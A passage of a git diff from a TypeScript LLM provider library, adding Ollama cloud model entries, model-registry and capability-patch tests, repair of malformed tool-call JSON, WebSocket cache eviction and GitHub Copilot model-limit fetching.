"https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 81920, - } satisfies Model<"openai-completions">, - "qwen3-coder:480b": { - id: "qwen3-coder:480b", - name: "Qwen 3 Coder 480B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: 
{"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 65536, - } satisfies Model<"openai-completions">, - "qwen3-coder-next": { - id: "qwen3-coder-next", - name: "Qwen 3 Coder Next", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 65536, - } satisfies Model<"openai-completions">, - "qwen3-next:80b": { - id: "qwen3-next:80b", - name: "Qwen 3 Next 80B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 32768, - } satisfies Model<"openai-completions">, - "qwen3-vl:235b-instruct": { - id: "qwen3-vl:235b-instruct", - name: "Qwen 3 VL 235B Instruct", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "qwen3-vl:235b": { - id: "qwen3-vl:235b", - name: "Qwen 
3 VL 235B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: true, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 32768, - } satisfies Model<"openai-completions">, - "rnj-1:8b": { - id: "rnj-1:8b", - name: "RNJ 1 8B", - api: "openai-completions", - provider: "ollama-cloud", - baseUrl: "https://ollama.com/v1", - compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false}, - reasoning: false, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 32768, - maxTokens: 4096, - } satisfies Model<"openai-completions">, }, } as const; diff --git a/packages/pi-ai/src/models.test.ts b/packages/pi-ai/src/models.test.ts new file mode 100644 index 000000000..068004ad3 --- /dev/null +++ b/packages/pi-ai/src/models.test.ts @@ -0,0 +1,231 @@ +import { describe, it } from "node:test"; +import assert from "node:assert/strict"; +import { getProviders, getModels, getModel, supportsXhigh, applyCapabilityPatches } from "./models.js"; +import type { Api, Model } from "./types.js"; + +// ═══════════════════════════════════════════════════════════════════════════ +// Custom provider preservation (regression: #2339) +// +// Custom providers (like alibaba-coding-plan) are manually maintained and +// NOT sourced from models.dev. They must survive models.generated.ts +// regeneration by living in models.custom.ts. 
+// ═══════════════════════════════════════════════════════════════════════════ + +describe("model registry — custom providers", () => { + it("alibaba-coding-plan is a registered provider", () => { + const providers = getProviders(); + assert.ok( + providers.includes("alibaba-coding-plan"), + `Expected "alibaba-coding-plan" in providers, got: ${providers.join(", ")}`, + ); + }); + + it("alibaba-coding-plan has all expected models", () => { + const models = getModels("alibaba-coding-plan"); + const ids = models.map((m) => m.id).sort(); + const expected = [ + "MiniMax-M2.5", + "glm-4.7", + "glm-5", + "kimi-k2.5", + "qwen3-coder-next", + "qwen3-coder-plus", + "qwen3-max-2026-01-23", + "qwen3.5-plus", + ]; + assert.deepEqual(ids, expected); + }); + + it("alibaba-coding-plan models use the correct base URL", () => { + const models = getModels("alibaba-coding-plan"); + for (const model of models) { + assert.equal( + model.baseUrl, + "https://coding-intl.dashscope.aliyuncs.com/v1", + `Model ${model.id} has wrong baseUrl: ${model.baseUrl}`, + ); + } + }); + + it("alibaba-coding-plan models use openai-completions API", () => { + const models = getModels("alibaba-coding-plan"); + for (const model of models) { + assert.equal(model.api, "openai-completions", `Model ${model.id} has wrong api: ${model.api}`); + } + }); + + it("alibaba-coding-plan models have provider set correctly", () => { + const models = getModels("alibaba-coding-plan"); + for (const model of models) { + assert.equal( + model.provider, + "alibaba-coding-plan", + `Model ${model.id} has wrong provider: ${model.provider}`, + ); + } + }); + + it("getModel retrieves alibaba-coding-plan models by provider+id", () => { + // Use type assertion to test runtime behavior — alibaba-coding-plan may come + // from custom models rather than the generated file, so the narrow + // GeneratedProvider type doesn't include it until models.custom.ts is merged. 
+ const model = getModel("alibaba-coding-plan" as any, "qwen3.5-plus" as any); + assert.ok(model, "Expected getModel to return a model for alibaba-coding-plan/qwen3.5-plus"); + assert.equal(model.id, "qwen3.5-plus"); + assert.equal(model.provider, "alibaba-coding-plan"); + }); +}); + +describe("model registry — custom zai provider (GLM-5.1)", () => { + it("zai provider includes glm-5.1 from custom models", () => { + const models = getModels("zai" as any); + const ids = models.map((m) => m.id); + assert.ok(ids.includes("glm-5.1"), `Expected "glm-5.1" in zai models, got: ${ids.join(", ")}`); + }); + + it("glm-5.1 has correct provider and base URL", () => { + const model = getModel("zai" as any, "glm-5.1" as any); + assert.ok(model, "Expected getModel to return a model for zai/glm-5.1"); + assert.equal(model.id, "glm-5.1"); + assert.equal(model.provider, "zai"); + assert.equal(model.baseUrl, "https://api.z.ai/api/coding/paas/v4"); + assert.equal(model.api, "openai-completions"); + }); + + it("glm-5.1 has reasoning enabled and correct context window", () => { + const model = getModel("zai" as any, "glm-5.1" as any); + assert.ok(model); + assert.equal(model.reasoning, true); + assert.equal(model.contextWindow, 204800); + assert.equal(model.maxTokens, 131072); + }); + + it("custom glm-5.1 does not overwrite generated zai models", () => { + const models = getModels("zai" as any); + const ids = models.map((m) => m.id); + // Generated models must still exist alongside custom glm-5.1 + assert.ok(ids.includes("glm-5"), "Generated glm-5 should still exist"); + assert.ok(ids.includes("glm-5-turbo"), "Generated glm-5-turbo should still exist"); + }); +}); + +describe("model registry — custom models do not collide with generated models", () => { + it("generated providers still exist alongside custom providers", () => { + const providers = getProviders(); + // Spot-check a few generated providers + assert.ok(providers.includes("openai"), "openai should be in providers"); + 
assert.ok(providers.includes("anthropic"), "anthropic should be in providers"); + }); +}); + +// ═══════════════════════════════════════════════════════════════════════════ +// Capability patches (regression: #2546) +// +// CAPABILITY_PATCHES must apply capabilities to models in the static +// registry AND to models constructed outside of it (custom, extension, +// discovered). supportsXhigh() reads model.capabilities — not model IDs. +// ═══════════════════════════════════════════════════════════════════════════ + +/** Helper: build a minimal synthetic model for testing */ +function syntheticModel(overrides: Partial>): Model { + return { + id: "test-model", + name: "Test Model", + api: "openai-completions" as Api, + provider: "test-provider", + baseUrl: "https://example.com", + reasoning: false, + input: ["text"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 128000, + maxTokens: 16384, + ...overrides, + } as Model; +} + +describe("supportsXhigh — registry models", () => { + it("returns true for GPT-5.4 from the registry", () => { + const model = getModel("openai", "gpt-5.4" as any); + if (!model) return; // skip if model not in generated catalog + assert.equal(supportsXhigh(model), true); + }); + + it("returns false for a non-reasoning model", () => { + const models = getModels("openai"); + const nonXhigh = models.find((m) => !m.id.includes("gpt-5.")); + if (!nonXhigh) return; + assert.equal(supportsXhigh(nonXhigh), false); + }); +}); + +describe("supportsXhigh — synthetic models (regression: custom/extension models)", () => { + it("returns false for a model without capabilities", () => { + const model = syntheticModel({ id: "my-custom-model" }); + assert.equal(supportsXhigh(model), false); + }); + + it("returns true when capabilities.supportsXhigh is explicitly set", () => { + const model = syntheticModel({ + id: "my-custom-model", + capabilities: { supportsXhigh: true }, + }); + assert.equal(supportsXhigh(model), true); + }); 
+}); + +describe("applyCapabilityPatches", () => { + it("patches a GPT-5.4 model that has no capabilities", () => { + const model = syntheticModel({ id: "gpt-5.4-custom" }); + assert.equal(model.capabilities, undefined); + + const [patched] = applyCapabilityPatches([model]); + assert.equal(patched.capabilities?.supportsXhigh, true); + assert.equal(patched.capabilities?.supportsServiceTier, true); + }); + + it("patches a GPT-5.2 model", () => { + const model = syntheticModel({ id: "gpt-5.2" }); + const [patched] = applyCapabilityPatches([model]); + assert.equal(patched.capabilities?.supportsXhigh, true); + }); + + it("patches an Anthropic Opus 4.6 model", () => { + const model = syntheticModel({ + id: "claude-opus-4-6-20260301", + api: "anthropic-messages" as Api, + }); + const [patched] = applyCapabilityPatches([model]); + assert.equal(patched.capabilities?.supportsXhigh, true); + // Opus should not get supportsServiceTier + assert.equal(patched.capabilities?.supportsServiceTier, undefined); + }); + + it("preserves explicit capabilities over patches", () => { + const model = syntheticModel({ + id: "gpt-5.4-custom", + capabilities: { supportsXhigh: false, charsPerToken: 3 }, + }); + const [patched] = applyCapabilityPatches([model]); + // Explicit supportsXhigh: false wins over patch's true + assert.equal(patched.capabilities?.supportsXhigh, false); + // Patch fills in supportsServiceTier since it wasn't explicitly set + assert.equal(patched.capabilities?.supportsServiceTier, true); + // Explicit charsPerToken is preserved + assert.equal(patched.capabilities?.charsPerToken, 3); + }); + + it("does not modify models that match no patches", () => { + const model = syntheticModel({ id: "gemini-2.5-pro" }); + const [patched] = applyCapabilityPatches([model]); + assert.equal(patched.capabilities, undefined); + // Should return the same reference when unpatched + assert.equal(patched, model); + }); + + it("is idempotent — re-applying patches produces the same result", () => 
{ + const model = syntheticModel({ id: "gpt-5.3" }); + const first = applyCapabilityPatches([model]); + const second = applyCapabilityPatches(first); + assert.deepEqual(first[0].capabilities, second[0].capabilities); + }); +}); diff --git a/packages/pi-ai/src/models.ts b/packages/pi-ai/src/models.ts index 3c06c0cc6..ac0a729b7 100644 --- a/packages/pi-ai/src/models.ts +++ b/packages/pi-ai/src/models.ts @@ -1,9 +1,10 @@ import { MODELS } from "./models.generated.js"; -import type { Api, KnownProvider, Model, Usage } from "./types.js"; +import { CUSTOM_MODELS } from "./models.custom.js"; +import type { Api, KnownProvider, Model, ModelCapabilities, Usage } from "./types.js"; const modelRegistry: Map>> = new Map(); -// Initialize registry from MODELS on module load +// Initialize registry from auto-generated MODELS (models.dev catalog) for (const [provider, models] of Object.entries(MODELS)) { const providerModels = new Map>(); for (const [id, model] of Object.entries(models)) { @@ -12,12 +13,95 @@ for (const [provider, models] of Object.entries(MODELS)) { modelRegistry.set(provider, providerModels); } +// Merge manually-maintained custom providers that are NOT in models.dev. +// Custom models are additive — they never overwrite generated entries. +// See: https://github.com/gsd-build/gsd-2/issues/2339 +for (const [provider, models] of Object.entries(CUSTOM_MODELS)) { + if (!modelRegistry.has(provider)) { + modelRegistry.set(provider, new Map>()); + } + const providerModels = modelRegistry.get(provider)!; + for (const [id, model] of Object.entries(models)) { + if (!providerModels.has(id)) { + providerModels.set(id, model as Model); + } + } +} + +// ─── Capability Patches ─────────────────────────────────────────────────────── +// +// Declare capabilities for models that pre-date the `capabilities` field or +// that live in the auto-generated catalog (models.generated.ts) which we +// cannot edit directly. 
Pattern-matching on model IDs is acceptable HERE +// because this is the single source of truth — call sites must never repeat it. +// +// Add new entries as additional capabilities emerge. Existing models that +// define `capabilities` in their model definition take precedence (the patch +// only fills in fields that are not already set). + +type CapabilityPatch = { match: (m: Model) => boolean; caps: ModelCapabilities }; + +const CAPABILITY_PATCHES: CapabilityPatch[] = [ + // GPT-5.x supports xhigh thinking and OpenAI service tiers + { + match: (m) => m.id.includes("gpt-5.2") || m.id.includes("gpt-5.3") || m.id.includes("gpt-5.4"), + caps: { supportsXhigh: true, supportsServiceTier: true }, + }, + // Anthropic Opus 4.6 supports xhigh thinking + { + match: (m) => m.api === "anthropic-messages" && (m.id.includes("opus-4-6") || m.id.includes("opus-4.6")), + caps: { supportsXhigh: true }, + }, +]; + +/** + * Apply capability patches to a list of models. + * + * Models constructed outside the static pi-ai registry (custom models from + * models.json, extension-registered models, discovered models) do not pass + * through the module-init patch loop. Call this function after assembling + * any model list to ensure capabilities are set correctly. + * + * Explicit `capabilities` already set on a model take precedence over patches. 
+ */ +export function applyCapabilityPatches(models: Model[]): Model[] { + return models.map((model) => { + for (const patch of CAPABILITY_PATCHES) { + if (patch.match(model)) { + return { + ...model, + capabilities: { ...patch.caps, ...model.capabilities }, + }; + } + } + return model; + }); +} + +// Apply patches to the static registry at module load +for (const [, providerModels] of modelRegistry) { + for (const [id, model] of providerModels) { + for (const patch of CAPABILITY_PATCHES) { + if (patch.match(model)) { + providerModels.set(id, { + ...model, + capabilities: { ...patch.caps, ...model.capabilities }, + }); + break; + } + } + } +} + +/** Providers that have entries in the generated MODELS constant */ +type GeneratedProvider = keyof typeof MODELS & KnownProvider; + type ModelApi< - TProvider extends KnownProvider, + TProvider extends GeneratedProvider, TModelId extends keyof (typeof MODELS)[TProvider], > = (typeof MODELS)[TProvider][TModelId] extends { api: infer TApi } ? (TApi extends Api ? TApi : never) : never; -export function getModel( +export function getModel( provider: TProvider, modelId: TModelId, ): Model> { @@ -31,9 +115,9 @@ export function getProviders(): KnownProvider[] { export function getModels( provider: TProvider, -): Model>[] { +): Model[] { const models = modelRegistry.get(provider); - return models ? (Array.from(models.values()) as Model>[]) : []; + return models ? (Array.from(models.values()) as Model[]) : []; } export function calculateCost(model: Model, usage: Usage): Usage["cost"] { @@ -48,20 +132,12 @@ export function calculateCost(model: Model, usage: Usage /** * Check if a model supports xhigh thinking level. * - * Supported today: - * - GPT-5.2 / GPT-5.3 / GPT-5.4 model families - * - Anthropic Messages API Opus 4.6 models (xhigh maps to adaptive effort "max") + * Reads from `model.capabilities.supportsXhigh` — set via CAPABILITY_PATCHES + * for generated models or declared directly in custom model definitions. 
+ * Do not add model-ID or provider-name checks here; update CAPABILITY_PATCHES instead. */ export function supportsXhigh(model: Model): boolean { - if (model.id.includes("gpt-5.2") || model.id.includes("gpt-5.3") || model.id.includes("gpt-5.4")) { - return true; - } - - if (model.api === "anthropic-messages") { - return model.id.includes("opus-4-6") || model.id.includes("opus-4.6"); - } - - return false; + return model.capabilities?.supportsXhigh ?? false; } /** diff --git a/packages/pi-ai/src/providers/anthropic-shared.test.ts b/packages/pi-ai/src/providers/anthropic-shared.test.ts new file mode 100644 index 000000000..9b6718570 --- /dev/null +++ b/packages/pi-ai/src/providers/anthropic-shared.test.ts @@ -0,0 +1,29 @@ +import { describe, it } from "node:test"; +import assert from "node:assert/strict"; +import { mapStopReason } from "./anthropic-shared.js"; + +describe("mapStopReason", () => { + it("maps end_turn to stop", () => { + assert.equal(mapStopReason("end_turn"), "stop"); + }); + + it("maps max_tokens to length", () => { + assert.equal(mapStopReason("max_tokens"), "length"); + }); + + it("maps tool_use to toolUse", () => { + assert.equal(mapStopReason("tool_use"), "toolUse"); + }); + + it("maps pause_turn to pauseTurn (not stop)", () => { + // pause_turn means the server paused a long-running turn (e.g. native + // web search hit its iteration limit). Mapping it to "stop" causes the + // agent loop to exit, leaving an incomplete server_tool_use block in + // history which triggers a 400 on the next request. 
+ assert.equal(mapStopReason("pause_turn"), "pauseTurn"); + }); + + it("throws on unknown stop reason", () => { + assert.throws(() => mapStopReason("bogus"), /Unhandled stop reason/); + }); +}); diff --git a/packages/pi-ai/src/providers/anthropic-shared.ts b/packages/pi-ai/src/providers/anthropic-shared.ts index 4425df7dd..098f50721 100644 --- a/packages/pi-ai/src/providers/anthropic-shared.ts +++ b/packages/pi-ai/src/providers/anthropic-shared.ts @@ -31,6 +31,7 @@ import type { export type AnthropicApi = "anthropic-messages" | "anthropic-vertex"; import type { AssistantMessageEventStream } from "../utils/event-stream.js"; import { parseStreamingJson } from "../utils/json-parse.js"; +import { hasXmlParameterTags, repairToolJson } from "../utils/repair-tool-json.js"; import { sanitizeSurrogates } from "../utils/sanitize-unicode.js"; import { transformMessages } from "./transform-messages.js"; @@ -502,7 +503,7 @@ export function mapStopReason(reason: string): StopReason { case "refusal": return "error"; case "pause_turn": - return "stop"; + return "pauseTurn"; case "stop_sequence": return "stop"; case "sensitive": @@ -696,7 +697,22 @@ export function processAnthropicStream( partial: output, }); } else if (block.type === "toolCall") { - block.arguments = parseStreamingJson(block.partialJson); + // Try strict parse first; if it fails, attempt YAML bullet + // repair (#2660) before falling back to the lenient streaming + // parser which silently swallows errors. + const raw = block.partialJson ?? ""; + const rawForParse = hasXmlParameterTags(raw) ? repairToolJson(raw) : raw; + let parsed: Record | undefined; + try { + parsed = JSON.parse(rawForParse); + } catch { + try { + parsed = JSON.parse(repairToolJson(rawForParse)); + } catch { + // Fall through to streaming parser + } + } + block.arguments = parsed ?? 
parseStreamingJson(block.partialJson); delete (block as any).partialJson; stream.push({ type: "toolcall_end", diff --git a/packages/pi-ai/src/providers/openai-codex-responses.ts b/packages/pi-ai/src/providers/openai-codex-responses.ts index 3a93e9fa0..294290188 100644 --- a/packages/pi-ai/src/providers/openai-codex-responses.ts +++ b/packages/pi-ai/src/providers/openai-codex-responses.ts @@ -451,6 +451,7 @@ async function* parseSSE(response: Response): AsyncGenerator void; @@ -635,6 +636,20 @@ async function acquireWebSocket( const socket = await connectWebSocket(url, headers, signal); const entry: CachedWebSocketConnection = { socket, busy: true }; + + // Evict the oldest entry if the cache is at capacity (LRU eviction). + if (websocketSessionCache.size >= MAX_WEBSOCKET_CACHE_SIZE) { + const oldestKey = websocketSessionCache.keys().next().value; + if (oldestKey) { + const oldEntry = websocketSessionCache.get(oldestKey); + websocketSessionCache.delete(oldestKey); + if (oldEntry) { + if (oldEntry.idleTimer) clearTimeout(oldEntry.idleTimer); + closeWebSocketSilently(oldEntry.socket); + } + } + } + websocketSessionCache.set(sessionId, entry); return { socket, @@ -705,12 +720,19 @@ async function* parseWebSocket(socket: WebSocketLike, signal?: AbortSignal): Asy resolve(); }; + const cleanup = () => { + socket.removeEventListener("message", onMessage); + socket.removeEventListener("error", onError); + socket.removeEventListener("close", onClose); + signal?.removeEventListener("abort", onAbort); + }; + const onMessage: WebSocketListener = (event) => { void (async () => { - if (!event || typeof event !== "object" || !("data" in event)) return; - const text = await decodeWebSocketData((event as { data?: unknown }).data); - if (!text) return; try { + if (!event || typeof event !== "object" || !("data" in event)) return; + const text = await decodeWebSocketData((event as { data?: unknown }).data); + if (!text) return; const parsed = JSON.parse(text) as Record; const type = 
typeof parsed.type === "string" ? parsed.type : ""; if (type === "response.completed" || type === "response.done") { @@ -719,7 +741,19 @@ async function* parseWebSocket(socket: WebSocketLike, signal?: AbortSignal): Asy } queue.push(parsed); wake(); - } catch {} + } catch (err) { + // Ensure listeners are cleaned up if the async handler errors. + // Without this, the fire-and-forget promise would swallow the + // error while leaving listeners attached to the socket. + if (err instanceof SyntaxError) { + // JSON parse failure — skip the malformed message. + return; + } + failed = err instanceof Error ? err : new Error(String(err)); + done = true; + cleanup(); + wake(); + } })(); }; @@ -775,10 +809,7 @@ async function* parseWebSocket(socket: WebSocketLike, signal?: AbortSignal): Asy throw new Error("WebSocket stream closed before response.completed"); } } finally { - socket.removeEventListener("message", onMessage); - socket.removeEventListener("error", onError); - socket.removeEventListener("close", onClose); - signal?.removeEventListener("abort", onAbort); + cleanup(); } } diff --git a/packages/pi-ai/src/types.ts b/packages/pi-ai/src/types.ts index af3afc5c8..661b58b57 100644 --- a/packages/pi-ai/src/types.ts +++ b/packages/pi-ai/src/types.ts @@ -13,7 +13,8 @@ export type KnownApi = | "bedrock-converse-stream" | "google-generative-ai" | "google-gemini-cli" - | "google-vertex"; + | "google-vertex" + | "ollama-chat"; export type Api = KnownApi | (string & {}); @@ -43,6 +44,7 @@ export type KnownProvider = | "opencode-go" | "kimi-coding" | "alibaba-coding-plan" + | "ollama" | "ollama-cloud"; export type Provider = KnownProvider | string; @@ -192,7 +194,7 @@ export interface Usage { }; } -export type StopReason = "stop" | "length" | "toolUse" | "error" | "aborted"; +export type StopReason = "stop" | "length" | "toolUse" | "pauseTurn" | "error" | "aborted"; export interface UserMessage { role: "user"; @@ -211,9 +213,23 @@ export interface AssistantMessage { 
errorMessage?: string; /** Server-requested retry delay in milliseconds (from Retry-After or rate limit headers). */ retryAfterMs?: number; + /** Provider inference performance metrics (e.g. tokens/sec from local models). */ + inferenceMetrics?: InferenceMetrics; timestamp: number; // Unix timestamp in milliseconds } +/** Inference performance metrics reported by providers that support it (e.g. Ollama). */ +export interface InferenceMetrics { + /** Tokens generated per second during eval phase. */ + tokensPerSecond: number; + /** Wall-clock duration of the full request in milliseconds. */ + totalDurationMs: number; + /** Duration of the eval (generation) phase in milliseconds. */ + evalDurationMs: number; + /** Duration of the prompt eval phase in milliseconds. */ + promptEvalDurationMs: number; +} + export interface ToolResultMessage { role: "toolResult"; toolCallId: string; @@ -250,10 +266,10 @@ export type AssistantMessageEvent = | { type: "thinking_end"; contentIndex: number; content: string; partial: AssistantMessage } | { type: "toolcall_start"; contentIndex: number; partial: AssistantMessage } | { type: "toolcall_delta"; contentIndex: number; delta: string; partial: AssistantMessage } - | { type: "toolcall_end"; contentIndex: number; toolCall: ToolCall; partial: AssistantMessage } + | { type: "toolcall_end"; contentIndex: number; toolCall: ToolCall; partial: AssistantMessage; malformedArguments?: boolean } | { type: "server_tool_use"; contentIndex: number; partial: AssistantMessage } | { type: "web_search_result"; contentIndex: number; partial: AssistantMessage } - | { type: "done"; reason: Extract; message: AssistantMessage } + | { type: "done"; reason: Extract; message: AssistantMessage } | { type: "error"; reason: Extract; error: AssistantMessage }; /** @@ -318,6 +334,32 @@ export interface VercelGatewayRouting { order?: string[]; } +/** + * Provider-agnostic capability declarations for a model. 
+ * + * These fields allow models to self-declare supported features so that call + * sites can read from metadata rather than pattern-matching on model IDs or + * provider names. Add fields here as new cross-provider capabilities emerge. + */ +export interface ModelCapabilities { + /** Whether the model supports xhigh thinking level. */ + supportsXhigh?: boolean; + /** + * Whether tool call IDs must be included and normalised in tool results for + * this model. Relevant for models deployed cross-provider (e.g. Claude or + * GPT variants via Google APIs) where the host API imposes stricter ID rules. + */ + requiresToolCallId?: boolean; + /** Whether OpenAI-style service tiers (priority/flex) apply to this model. */ + supportsServiceTier?: boolean; + /** + * Approximate characters per token for this model. + * Used as a fallback when an accurate tokenizer is unavailable. + * If omitted, the provider-level default is used. + */ + charsPerToken?: number; +} + // Model interface for the unified model system export interface Model { id: string; @@ -342,4 +384,11 @@ export interface Model { : TApi extends "openai-responses" ? OpenAIResponsesCompat : never; + /** + * Provider-agnostic capability declarations for this model. + * Read these fields instead of pattern-matching on model IDs or provider names. + */ + capabilities?: ModelCapabilities; + /** Opaque provider-specific options. Cast to the appropriate type in the provider's stream handler. 
*/ + providerOptions?: Record; } diff --git a/packages/pi-ai/src/utils/event-stream.ts b/packages/pi-ai/src/utils/event-stream.ts index 74947477e..7eb0a0104 100644 --- a/packages/pi-ai/src/utils/event-stream.ts +++ b/packages/pi-ai/src/utils/event-stream.ts @@ -80,3 +80,8 @@ export class AssistantMessageEventStream extends EventStream(partialJson: string | undefined): T { - return nativeParseStreamingJson(partialJson); + if (!partialJson || partialJson.trim() === "") { + return {} as T; + } + + // Fast path: try native streaming parser first + const result = nativeParseStreamingJson(partialJson); + + // XML parameter tags can be trapped inside otherwise valid JSON strings, + // so run repair before trusting the native parse result. + if (hasXmlParameterTags(partialJson)) { + try { + return JSON.parse(repairToolJson(partialJson)) as T; + } catch { + // Fall through to the native parser result on incomplete partials + } + } + + // If the native parser returned a non-empty result, use it. + // Only attempt repair when the result is empty AND the input + // contains YAML bullet patterns (avoids unnecessary work). 
+ if ( + result && + typeof result === "object" && + Object.keys(result as object).length === 0 && + hasYamlBulletLists(partialJson) + ) { + try { + return JSON.parse(repairToolJson(partialJson)) as T; + } catch { + // Repair failed — return the empty object from native parser + } + } + + return result; } diff --git a/packages/pi-ai/src/utils/oauth/github-copilot.ts b/packages/pi-ai/src/utils/oauth/github-copilot.ts index 08ffb24d3..eae8e9a5f 100644 --- a/packages/pi-ai/src/utils/oauth/github-copilot.ts +++ b/packages/pi-ai/src/utils/oauth/github-copilot.ts @@ -8,6 +8,8 @@ import type { OAuthCredentials, OAuthLoginCallbacks, OAuthProviderInterface } fr type CopilotCredentials = OAuthCredentials & { enterpriseUrl?: string; + /** Model limits from the /models API, keyed by model ID */ + modelLimits?: Record; }; const decode = (s: string) => atob(s); @@ -305,6 +307,47 @@ async function enableAllGitHubCopilotModels( ); } +async function fetchCopilotModelLimits( + token: string, + enterpriseDomain?: string, +): Promise> { + const baseUrl = getGitHubCopilotBaseUrl(token, enterpriseDomain); + try { + const response = await fetch(`${baseUrl}/models`, { + headers: { + Accept: "application/json", + Authorization: `Bearer ${token}`, + "X-GitHub-Api-Version": "2025-05-01", + ...COPILOT_HEADERS, + }, + signal: AbortSignal.timeout(30_000), + }); + if (!response.ok) return {}; + const data = (await response.json()) as { + data?: Array<{ + id: string; + capabilities?: { + limits?: { + max_context_window_tokens?: number; + max_output_tokens?: number; + }; + }; + }>; + }; + const limits: Record = {}; + for (const m of data.data || []) { + const ctx = m.capabilities?.limits?.max_context_window_tokens; + const out = m.capabilities?.limits?.max_output_tokens; + if (typeof ctx === "number" && typeof out === "number" && ctx > 0 && out > 0 && Number.isFinite(ctx) && Number.isFinite(out)) { + limits[m.id] = { contextWindow: ctx, maxTokens: out }; + } + } + return limits; + } catch { + 
return {}; + } +} + /** * Login with GitHub Copilot OAuth (device code flow) * @@ -351,6 +394,14 @@ export async function loginGitHubCopilot(options: { // Enable all models after successful login options.onProgress?.("Enabling models..."); await enableAllGitHubCopilotModels(credentials.access, enterpriseDomain ?? undefined); + + // Fetch real model limits from the Copilot API + options.onProgress?.("Fetching model limits..."); + const modelLimits = await fetchCopilotModelLimits(credentials.access, enterpriseDomain ?? undefined); + if (Object.keys(modelLimits).length > 0) { + (credentials as CopilotCredentials).modelLimits = modelLimits; + } + return credentials; } @@ -369,7 +420,16 @@ export const githubCopilotOAuthProvider: OAuthProviderInterface = { async refreshToken(credentials: OAuthCredentials): Promise { const creds = credentials as CopilotCredentials; - return refreshGitHubCopilotToken(creds.refresh, creds.enterpriseUrl); + const refreshed = await refreshGitHubCopilotToken(creds.refresh, creds.enterpriseUrl); + try { + const modelLimits = await fetchCopilotModelLimits(refreshed.access, creds.enterpriseUrl); + if (Object.keys(modelLimits).length > 0) { + (refreshed as CopilotCredentials).modelLimits = modelLimits; + } + } catch { + // Model limits fetch is best-effort; don't block token refresh + } + return refreshed; }, getApiKey(credentials: OAuthCredentials): string { @@ -380,6 +440,18 @@ export const githubCopilotOAuthProvider: OAuthProviderInterface = { const creds = credentials as CopilotCredentials; const domain = creds.enterpriseUrl ? (normalizeDomain(creds.enterpriseUrl) ?? undefined) : undefined; const baseUrl = getGitHubCopilotBaseUrl(creds.access, domain); - return models.map((m) => (m.provider === "github-copilot" ? 
{ ...m, baseUrl } : m)); + const limits = creds.modelLimits; + return models.map((m) => { + if (m.provider !== "github-copilot") return m; + const modelLimits = limits?.[m.id]; + return { + ...m, + baseUrl, + ...(modelLimits && { + contextWindow: modelLimits.contextWindow, + maxTokens: modelLimits.maxTokens, + }), + }; + }); }, }; diff --git a/packages/pi-ai/src/utils/repair-tool-json.ts b/packages/pi-ai/src/utils/repair-tool-json.ts new file mode 100644 index 000000000..27ea7b14c --- /dev/null +++ b/packages/pi-ai/src/utils/repair-tool-json.ts @@ -0,0 +1,220 @@ +/** + * Repair malformed JSON in LLM tool-call arguments. + * + * LLMs sometimes copy YAML template formatting into JSON tool arguments, + * producing patterns like: + * + * "keyDecisions": - Used Web Notification API..., + * "keyFiles": - src-tauri/src/lib.rs — Extended... + * + * instead of valid JSON arrays: + * + * "keyDecisions": ["Used Web Notification API..."], + * "keyFiles": ["src-tauri/src/lib.rs — Extended..."] + * + * This module detects and repairs such patterns before JSON.parse is called. + * + * @see https://github.com/gsd-build/gsd-2/issues/2660 + */ + +/** + * Detect whether a JSON string contains YAML-style bullet-list values + * (i.e. `"key": - item` instead of `"key": ["item"]`). + */ +export function hasYamlBulletLists(json: string): boolean { + // Match: "key": followed by whitespace then a dash-space pattern (YAML bullet) + // The negative lookahead excludes negative numbers (e.g. "key": -1) + return /"\s*:\s*-\s+(?!\d)/.test(json); +} + +/** + * Detect whether a JSON string contains XML parameter tags + * (i.e. `value`). + * + * Some models mix XML tool-call syntax into JSON string values, + * producing hybrid output that fails JSON.parse. 
